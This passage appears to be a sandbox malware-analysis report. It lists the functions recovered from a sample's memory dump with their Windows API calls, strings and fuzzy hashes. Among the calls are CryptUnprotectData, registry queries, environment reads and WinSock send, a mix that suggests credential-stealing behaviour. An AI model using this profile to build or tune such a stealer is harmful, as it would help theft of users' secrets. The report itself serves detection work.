                  • Opcode ID: da748c78d823400cb02280adb2114f50ee24cd5eff2677ad97bae4deda1091bd
                  • Instruction ID: dec273239ea73fa7a07621d647f46b56ae223e5787b4c318017b15b8959b3f61
                  • Opcode Fuzzy Hash: da748c78d823400cb02280adb2114f50ee24cd5eff2677ad97bae4deda1091bd
                  • Instruction Fuzzy Hash: 9BF04C727012213AD714716E9A01BAB968E7FD5358FA9413BB104C3285EDFCEC024369
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetProcessHeap.KERNEL32(?,?,?,004228FD,?,?,?,?,004228AF,00000000,?,?,?,?,?,00428202), ref: 0042A819
                  • HeapAlloc.KERNEL32(00000000,00000000,?,?,?,?,004228FD,?,?,?,?,004228AF,00000000,?,?), ref: 0042A822
                  • GetProcessHeap.KERNEL32(?,?,?,004228FD,?,?,?,?,004228AF,00000000,?,?,?,?,?,00428202), ref: 0042A82D
                  • HeapAlloc.KERNEL32(00000000,00000000,?,?,?,?,004228FD,?,?,?,?,004228AF,00000000,?,?), ref: 0042A836
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp Download File
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp Download File
                  Similarity
                  • API ID: Heap$AllocProcess
                  • String ID:
                  • API String ID: 1617791916-0
                  • Opcode ID: 0193bb2f926b99187a57ffa291244f502222d5b52d6ebc0f5cc7c223c44ea0a4
                  • Instruction ID: 9bcbac53ff5d094d10d3d38bd3071df2fe02a2a4fa41159632f9f6d6fc93acf0
                  • Opcode Fuzzy Hash: 0193bb2f926b99187a57ffa291244f502222d5b52d6ebc0f5cc7c223c44ea0a4
                  • Instruction Fuzzy Hash: 2FE02B317042202BDB2831766D02FAF629C87C5754F56043FB906D3182EC9CF41241BE
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • RegOpenKeyExW.ADVAPI32(80000001,00000000,00000000,00000001,00419D1B), ref: 0040D008
                  • RegQueryValueExW.ADVAPI32(00419D1B,00000000,00000000,00000000,00000000,00000800,80000001,00000000,00000000,00000001,00419D1B), ref: 0040D04E
                  • RegCloseKey.ADVAPI32(00419D1B,00419D1B,00000000,00000000,00000000,00000000,00000800,80000001,00000000,00000000,00000001,00419D1B), ref: 0040D05F
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp Download File
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp Download File
                  Similarity
                  • API ID: CloseOpenQueryValue
                  • String ID:
                  • API String ID: 3677997916-0
                  • Opcode ID: b5f5d9174510e7a6bc75b62cc52c90a59e3499243867020caf7ad12ddda0ef67
                  • Instruction ID: 3852e287672dba7fda1560141fd7a8bfb1d67c4f70b0ddb506a4c4ab44fe0230
                  • Opcode Fuzzy Hash: b5f5d9174510e7a6bc75b62cc52c90a59e3499243867020caf7ad12ddda0ef67
                  • Instruction Fuzzy Hash: B02158B1E002065BDB10AA95C851BBE77A9EFC4718F10442BE5157B2C1DBB85D06CB94
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetProcessHeap.KERNEL32(?,00425BEA,?,?,00425BB3,?,004281D8,?,?,?,004281C2,?,?,00428105), ref: 00420308
                  • GetProcessHeap.KERNEL32(?,00425BEA,?,?,00425BB3,?,004281D8,?,?,?,004281C2,?,?,00428105), ref: 00420310
                  • HeapFree.KERNEL32(00000000,00000000,?,?,00425BEA,?,?,00425BB3,?,004281D8,?,?,?,004281C2,?), ref: 0042031B
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp Download File
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp Download File
                  Similarity
                  • API ID: Heap$Process$Free
                  • String ID:
                  • API String ID: 3168794593-0
                  • Opcode ID: 2708b387d49ca749e9b2ccaeb1f23aca9a6a26682e673b90e6ff341d86e38bcd
                  • Instruction ID: 1f4a678d6c1447a8fc6e4e3eba0b79a2ee32cd65acd7544aa12ccca0704f60be
                  • Opcode Fuzzy Hash: 2708b387d49ca749e9b2ccaeb1f23aca9a6a26682e673b90e6ff341d86e38bcd
                  • Instruction Fuzzy Hash: 8EC08C31202130AADC5132A53E02FCEC0AC2FDE71CF12382BF6202300308EC688002FD
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • send.WS2_32(?,?,7FFFFFFF,00000000), ref: 00402221
                  Strings
                  • failed to write whole buffer:, xrefs: 0040229C
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp Download File
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp Download File
                  Similarity
                  • API ID: send
                  • String ID: failed to write whole buffer:
                  • API String ID: 2809346765-228929174
                  • Opcode ID: c6a487baafd679690e07d1e934be619502195405c6ee991bd1bf229a349439fe
                  • Instruction ID: 97715c0b0757928118a82d42b423db5018afd5cc8c01dd58e584cdd5e086ad5c
                  • Opcode Fuzzy Hash: c6a487baafd679690e07d1e934be619502195405c6ee991bd1bf229a349439fe
                  • Instruction Fuzzy Hash: 8C218B71E002199FDB04DFD5D985AEEB7B5AB88320F20416EE814B73C0D6B85D418BA5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                    • Part of subcall function 0042A962: GetFileInformationByHandle.KERNEL32(?,?), ref: 0042A99C
                    • Part of subcall function 0042A962: CloseHandle.KERNEL32(?,?,?), ref: 0042A9B6
                  • memcpy.MSVCRT ref: 0040DC65
                  • memcpy.MSVCRT ref: 0040DCD2
                    • Part of subcall function 0042BAF9: memcpy.MSVCRT ref: 0042BB37
                    • Part of subcall function 0042BAF9: memcpy.MSVCRT ref: 0042BB56
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp Download File
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp Download File
                  Similarity
                  • API ID: memcpy$Handle$CloseFileInformation
                  • String ID:
                  • API String ID: 4527847-0
                  • Opcode ID: 8ea78b569f26094799a494244ebe1a752620ca4233e613a8dac0046be4b6898f
                  • Instruction ID: 899f3da9c73fa544454501242ceba460d7d10d7444c5a13fd1fdfe32ca1cdad7
                  • Opcode Fuzzy Hash: 8ea78b569f26094799a494244ebe1a752620ca4233e613a8dac0046be4b6898f
                  • Instruction Fuzzy Hash: 9C826C71A087808BD735DF15C441BABB3E1BFC8314F148D2EE98DAB291DB74A945CB46
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • CreateFileW.KERNEL32(?,?,?,?,00000004,004294C4,00000000,?,?,?,?,?,?,?,?), ref: 00429659
                  • GetLastError.KERNEL32(?,?,?,?,00000004,004294C4,00000000,?,?,?,?,?,?,?,?), ref: 0042966A
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp Download File
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp Download File
                  Similarity
                  • API ID: CreateErrorFileLast
                  • String ID:
                  • API String ID: 1214770103-0
                  • Opcode ID: c5a9ae419e08b8adb3559d3eec068b8f2cc180d0e306f3e1a969396a9759875b
                  • Instruction ID: 11827236142a8bfd92faffd2f3e44e6377f678d34ec19fdfba37aed79c972e7f
                  • Opcode Fuzzy Hash: c5a9ae419e08b8adb3559d3eec068b8f2cc180d0e306f3e1a969396a9759875b
                  • Instruction Fuzzy Hash: 9751D0B2B042659FDB15CF65D4103EABBE1AF99314F68815EC8886B341C37A9C47CB98
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp Download File
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp Download File
                  Similarity
                  • API ID: CloseHandle
                  • String ID:
                  • API String ID: 2962429428-0
                  • Opcode ID: fd7857b542b93c57daffc418569f7607fe9385b98a877aa1337391bb24044f3d
                  • Instruction ID: 75137c320050f20dc47d3f29d0b7eb3a0c978b0e33fc483d5794cf8ae75c158b
                  • Opcode Fuzzy Hash: fd7857b542b93c57daffc418569f7607fe9385b98a877aa1337391bb24044f3d
                  • Instruction Fuzzy Hash: 00418171E006199FCB05DFA5D881AEEFBB5FF88310F10856AE809AB241DB349945CBA4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp Download File
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp Download File
                  Similarity
                  • API ID: memcpy
                  • String ID:
                  • API String ID: 3510742995-0
                  • Opcode ID: a7c9a0460c2adde3b465e1651f71537f1d7f8fe9ec663ebd68dcbd04b98e780c
                  • Instruction ID: 8590ec2bdb20ddf8b3f1076f794da8906dbbacc6968e23c663897a749d0e569d
                  • Opcode Fuzzy Hash: a7c9a0460c2adde3b465e1651f71537f1d7f8fe9ec663ebd68dcbd04b98e780c
                  • Instruction Fuzzy Hash: 342127327002009FDB24DF25D846A9BBBE4EFC8304F40415EEA48CB791E739E902CB85
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp Download File
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp Download File
                  Similarity
                  • API ID: CloseHandle
                  • String ID:
                  • API String ID: 2962429428-0
                  • Opcode ID: e5792be77418c2963abb0302570d82c5c5af203efdc7efbb0088842242bd11b5
                  • Instruction ID: 610d673e7fc3bc17ed9335eabf8bb1475443a7b91fc49725d2f4af39385806ac
                  • Opcode Fuzzy Hash: e5792be77418c2963abb0302570d82c5c5af203efdc7efbb0088842242bd11b5
                  • Instruction Fuzzy Hash: 37326A71A087118FC728CF19D48066AF7E1FFC9324F54895EE8998B351CB74E986CB86
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • SetFilePointerEx.KERNEL32(?,?,?,?,00000000), ref: 0042979F
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp Download File
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp Download File
                  Similarity
                  • API ID: FilePointer
                  • String ID:
                  • API String ID: 973152223-0
                  • Opcode ID: 46c44c84d45476834c2ee320423c77be90fb7802e77131acbfe8a26b1f130f70
                  • Instruction ID: abbbb73066b1e89b35006f2457b303de4cf204f18af197b02bf7ddbecb15ec2d
                  • Opcode Fuzzy Hash: 46c44c84d45476834c2ee320423c77be90fb7802e77131acbfe8a26b1f130f70
                  • Instruction Fuzzy Hash: E5015A766107059FC310DF29D881A67B7E9EBC9334F14896EE89987351E734EC00CB92
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,?,?,00415B8E,0000000E), ref: 00429D2B
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp Download File
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp Download File
                  Similarity
                  • API ID: CreateDirectory
                  • String ID:
                  • API String ID: 4241100979-0
                  • Opcode ID: cb59707e54c81aa7004f8990a3a3ea1ef0dcc2938ab34efb35c5993475b7cd0a
                  • Instruction ID: 6850bf76e51ca2512a76549e3e1cfa2193a34ebfa4c824e2eb6919d0a7c72580
                  • Opcode Fuzzy Hash: cb59707e54c81aa7004f8990a3a3ea1ef0dcc2938ab34efb35c5993475b7cd0a
                  • Instruction Fuzzy Hash: 11014C74E04216DFCB14EF59E5009AEFBF5AF98310F60842EE449A7340D7346D11CBA9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • shutdown.WS2_32(?,00000002), ref: 0042A648
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp Download File
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp Download File
                  Similarity
                  • API ID: shutdown
                  • String ID:
                  • API String ID: 2510479042-0
                  • Opcode ID: 2b604d89d1251beda2498bd4bf23b963002ca5c6763f3c6f4fadc0308e6c17fe
                  • Instruction ID: 7379be74fcb69b19220905868e1ab546d324ef6f8fb523c0547621287cb13164
                  • Opcode Fuzzy Hash: 2b604d89d1251beda2498bd4bf23b963002ca5c6763f3c6f4fadc0308e6c17fe
                  • Instruction Fuzzy Hash: 80E0D871B002159BC720AB55E4019AEB7F8DBC5B10F54443FE88557341EB786815C766
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • FindClose.KERNEL32(00000007,?,?,00428202,?,?,?,004281C2,?,?,00428105,?,?,?,?,?), ref: 0042A8BE
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp Download File
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp Download File
                  Similarity
                  • API ID: CloseFind
                  • String ID:
                  • API String ID: 1863332320-0
                  • Opcode ID: 9a4912bc9ec9d477fa7e0fa2e67913deb91a8f7aa7f648133bedcfd8f67bf69f
                  • Instruction ID: 941bf184125f6f68736dc15367b2a646d1df898934473a0011bcd629974c0bf5
                  • Opcode Fuzzy Hash: 9a4912bc9ec9d477fa7e0fa2e67913deb91a8f7aa7f648133bedcfd8f67bf69f
                  • Instruction Fuzzy Hash: 9B90025105530D27441432EB69068577A4C448A568941255AB50C05522195BF85140A9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp Download File
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp Download File
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0cb4c4eec040199fee4dc9555f5828303b8eede4e952d2733895d5e1bc98df50
                  • Instruction ID: 1da829b760d8f81a989f5bbc8035d7f879d482c9ea3af9cdf5e0771f70e2e91e
                  • Opcode Fuzzy Hash: 0cb4c4eec040199fee4dc9555f5828303b8eede4e952d2733895d5e1bc98df50
                  • Instruction Fuzzy Hash: 8C910375908F859BC321CF29C44065BFBF1FFCA390F108A1EE89A5B211DB34A485DB82
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,0040238E,?,?,?,?,?,?), ref: 00429C9A
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp Download File
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp Download File
                  Similarity
                  • API ID: CloseHandle
                  • String ID:
                  • API String ID: 2962429428-0
                  • Opcode ID: 1b94c5a453b50f81de54ad95322219737c73dc1f1d8e038cfffade6479239b4e
                  • Instruction ID: 522af6b1b9f57d241ac44f1f7110163613e705cb34c5dbf1c96f90d0217e932e
                  • Opcode Fuzzy Hash: 1b94c5a453b50f81de54ad95322219737c73dc1f1d8e038cfffade6479239b4e
                  • Instruction Fuzzy Hash: 49019272A10616AFE704DF16D485766F7F4FF4432AF10891ED41887680D778A859CBD4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Non-executed Functions

                  APIs
                  • memset.MSVCRT ref: 0042618A
                  • GetModuleHandleW.KERNEL32(NTDLL.DLL,00000001,?,0042A13C), ref: 004261A4
                  • FormatMessageW.KERNEL32(00001200,00000000,?,00000800,?,00000800,00000000,00000001,?,0042A13C), ref: 004261D0
                  • GetLastError.KERNEL32(00001200,00000000,?,00000800,?,00000800,00000000,00000001,?,0042A13C), ref: 004263C8
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp Download File
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp Download File
                  Similarity
                  • API ID: ErrorFormatHandleLastMessageModulememset
                  • String ID: NTDLL.DLL
                  • API String ID: 1434010500-1613819793
                  • Opcode ID: f1389bfd3e1173af358aeba26ae448217c95a3fe697d43b93f02a51dbee2fdb5
                  • Instruction ID: de5b3ba683100ae717a82302d40545980fcb70492a69535b58ea76c4ff09c937
                  • Opcode Fuzzy Hash: f1389bfd3e1173af358aeba26ae448217c95a3fe697d43b93f02a51dbee2fdb5
                  • Instruction Fuzzy Hash: 08914B71F002258BDB18CF58E8807AEB7A2EB88344F6A816FD415D7381D7789D428B9C
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • SetUnhandledExceptionFilter.KERNEL32 ref: 00434FCF
                  • UnhandledExceptionFilter.KERNEL32 ref: 00434FDF
                  • GetCurrentProcess.KERNEL32 ref: 00434FE8
                  • TerminateProcess.KERNEL32 ref: 00434FF9
                  • abort.MSVCRT ref: 00435002
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp Download File
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp Download File
                  Similarity
                  • API ID: ExceptionFilterProcessUnhandled$CurrentTerminateabort
                  • String ID:
                  • API String ID: 520269711-0
                  • Opcode ID: 603fab6d6031717bba89a8fd962297ff91c897535197ca1225de2aec387a3722
                  • Instruction ID: 763f0f60f22319e77168f6064c17099a9036ae16a9997b7172d57bf969269d13
                  • Opcode Fuzzy Hash: 603fab6d6031717bba89a8fd962297ff91c897535197ca1225de2aec387a3722
                  • Instruction Fuzzy Hash: 5B1128B8905704DFD304EF69E94970EBBF0BB49701F41892DE88887320E7759A44CF5A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • SetUnhandledExceptionFilter.KERNEL32 ref: 00434FCF
                  • UnhandledExceptionFilter.KERNEL32 ref: 00434FDF
                  • GetCurrentProcess.KERNEL32 ref: 00434FE8
                  • TerminateProcess.KERNEL32 ref: 00434FF9
                  • abort.MSVCRT ref: 00435002
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp Download File
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp Download File
                  Similarity
                  • API ID: ExceptionFilterProcessUnhandled$CurrentTerminateabort
                  • String ID:
                  • API String ID: 520269711-0
                  • Opcode ID: b45d2d52b1454ed0e5aff68418d3275a935fde892632a3644c5eb4d8e23cc7d3
                  • Instruction ID: a6df32a857b356ede60e5d22738e7b59e6c2e4c69556093040c1835c780afeb5
                  • Opcode Fuzzy Hash: b45d2d52b1454ed0e5aff68418d3275a935fde892632a3644c5eb4d8e23cc7d3
                  • Instruction Fuzzy Hash: 711117B9801604DFD704EFB9EA4924DBBF0BB4A702F41853DE98497320E774A944CF9A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040CEF6
                  • memmove.MSVCRT ref: 0040CF1C
                  • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,004118FA,?,?,0040C003,21750100,?), ref: 0040CF27
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp Download File
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp Download File
                  Similarity
                  • API ID: CryptDataFreeLocalUnprotectmemmove
                  • String ID:
                  • API String ID: 1275420628-0
                  • Opcode ID: aa222cf3e9b3e499c0c314c0c56fafe57042f3466d0b0f4c300799db841dcfe0
                  • Instruction ID: ceddcd13dfc6efece42cf3ccadf7cc9e5e41c9a6cfd1d511341e46566c594759
                  • Opcode Fuzzy Hash: aa222cf3e9b3e499c0c314c0c56fafe57042f3466d0b0f4c300799db841dcfe0
                  • Instruction Fuzzy Hash: 5D318B7090070ACFCB10DF65C880A9AFBF5FF89314F20892EE449AB351D738A885CB95
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Strings
                  • Unknown pseudo relocation protocol version %d., xrefs: 004355D4
                  • Unknown pseudo relocation bit size %d., xrefs: 00435509
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp Download File
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp Download File
                  Similarity
                  • API ID: ProtectVirtual
                  • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                  • API String ID: 544645111-395989641
                  • Opcode ID: 7c095f7f3c2cc72337808267503d2b384a9386ec5e133b8f22b0e6ad9c201ee7
                  • Instruction ID: 33c40b08a6868cb4459415c46d263b87b6ac111bfc5677187d762cf8ade3e6f4
                  • Opcode Fuzzy Hash: 7c095f7f3c2cc72337808267503d2b384a9386ec5e133b8f22b0e6ad9c201ee7
                  • Instruction Fuzzy Hash: 33A1B370A04A008BCB14DF68D88135AB7F1BF4C318F64962FE8988B395D77DD941CB5A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Strings
                  • VirtualQuery failed for %d bytes at address %p, xrefs: 00435337
                  • @, xrefs: 004352E8
                  • VirtualProtect failed with code 0x%x, xrefs: 0043530A
                  • Address %p has no image-section, xrefs: 0043534B
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp Download File
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp Download File
                  Similarity
                  • API ID: QueryVirtual
                  • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$@$Address %p has no image-section
                  • API String ID: 1804819252-1098444051
                  • Opcode ID: 92b505330fdd85d230228bd6d3ab4770ef8da3955b846c3e45030b819ef60baf
                  • Instruction ID: b498f59fa2bc1cd9348893745530977bdc4379a761c68fc53a811ecddd403986
                  • Opcode Fuzzy Hash: 92b505330fdd85d230228bd6d3ab4770ef8da3955b846c3e45030b819ef60baf
                  • Instruction Fuzzy Hash: A9419DB5A007018FC700DF69D88464AFBF4FB88354F55892EE88887312E374E905CF99
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetStdHandle.KERNEL32(000000F4,?,?,?,?,00427469,?,00000000), ref: 004274AE
                  • GetLastError.KERNEL32(000000F4,000000F4,?,?,?,?,00427469,?,00000000), ref: 004274C1
                  • GetConsoleMode.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,000000F4,000000F4,?), ref: 004274FE
                  • memset.MSVCRT ref: 004275B8
                    • Part of subcall function 0042731B: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00427337
                  Strings
                  • failed to write whole buffer:, xrefs: 004277EC
                  • Windows stdio in console mode does not support writing non-UTF-8 byte sequences, xrefs: 0042770D
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp Download File
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp Download File
                  Similarity
                  • API ID: ConsoleErrorFileHandleLastModeWritememset
                  • String ID: Windows stdio in console mode does not support writing non-UTF-8 byte sequences$failed to write whole buffer:
                  • API String ID: 1752357600-2385713539
                  • Opcode ID: d6b7eb637e757988c6c39cf05c6c684a855f2e246eaf0015faa0d3be3f3b1f8e
                  • Instruction ID: bbb12fe5c135fd95cbf3d8649de44f9b3ad6118214ed5dcceb907eb1bfbb2041
                  • Opcode Fuzzy Hash: d6b7eb637e757988c6c39cf05c6c684a855f2e246eaf0015faa0d3be3f3b1f8e
                  • Instruction Fuzzy Hash: A3A18C3160C3119FD314DF59E480A6BB7E1EFC8368F50892EF48987291DBB8E945CB5A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • memset.MSVCRT ref: 0040D4F3
                  • SetLastError.KERNEL32(00000000), ref: 0040D551
                  • GetEnvironmentVariableW.KERNEL32(00000200,?,00000200,00000000), ref: 0040D55C
                  • GetLastError.KERNEL32(?,00000002,00000200,00000000), ref: 0040D567
                  • GetLastError.KERNEL32(?,00000002,00000200,00000000), ref: 0040D574
                  • GetLastError.KERNEL32(?,00000002,00000200,00000000), ref: 0040D5C1
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp Download File
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp Download File
                  Similarity
                  • API ID: ErrorLast$EnvironmentVariablememset
                  • String ID:
                  • API String ID: 3677577337-0
                  • Opcode ID: cb56a3503f99b388f92e69c964ea334047f18215805e56469239bcf8e9f9b739
                  • Instruction ID: 323cf36331debb5a6bc26d7cbfb413960db558f9278f6318a4eabaa657799844
                  • Opcode Fuzzy Hash: cb56a3503f99b388f92e69c964ea334047f18215805e56469239bcf8e9f9b739
                  • Instruction Fuzzy Hash: 26B16A71A083119FD714DF55D480A1FBBE1AFC8318F10892EF89997391DB78E849CB8A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp Download File
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp Download File
                  Similarity
                  • API ID: Startupmemset
                  • String ID: d0D$d0D$d0D
                  • API String ID: 1873301828-95588852
                  • Opcode ID: 7e1e4a4db60f6421967eecad32e55c08a53e723be57d24a535e814ba8d820d11
                  • Instruction ID: 9ed7e24c64fc327149bf65d672ed8f4bdd435a14006f90ac1ed618fa38d84fb6
                  • Opcode Fuzzy Hash: 7e1e4a4db60f6421967eecad32e55c08a53e723be57d24a535e814ba8d820d11
                  • Instruction Fuzzy Hash: BA41C171B012259FEB18EF55E841B7EB7A1EFC4314F60C12EE6049B291DF78A801CB98
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • VirtualQuery.KERNEL32 ref: 0043529D
                  • VirtualProtect.KERNEL32 ref: 004352F7
                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00439DB8), ref: 00435304
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp Download File
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp Download File
                  Similarity
                  • API ID: Virtual$ErrorLastProtectQuery
                  • String ID: VirtualProtect failed with code 0x%x$@
                  • API String ID: 637304234-2953866262
                  • Opcode ID: eab175f31365b4763ca481413ccf0e391cf123a3dc06fc19bfc37778e7b7f265
                  • Instruction ID: 18c54a2c166cb18e1ddd73f620663aa3a3835134737ecd96f9aa2e3f05c7cc21
                  • Opcode Fuzzy Hash: eab175f31365b4763ca481413ccf0e391cf123a3dc06fc19bfc37778e7b7f265
                  • Instruction Fuzzy Hash: C8213DB5504B018FD300DF28D98465AFBE0BF88318F558A6EE89887366E378D905CF55
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetSystemTimeAsFileTime.KERNEL32 ref: 00434F09
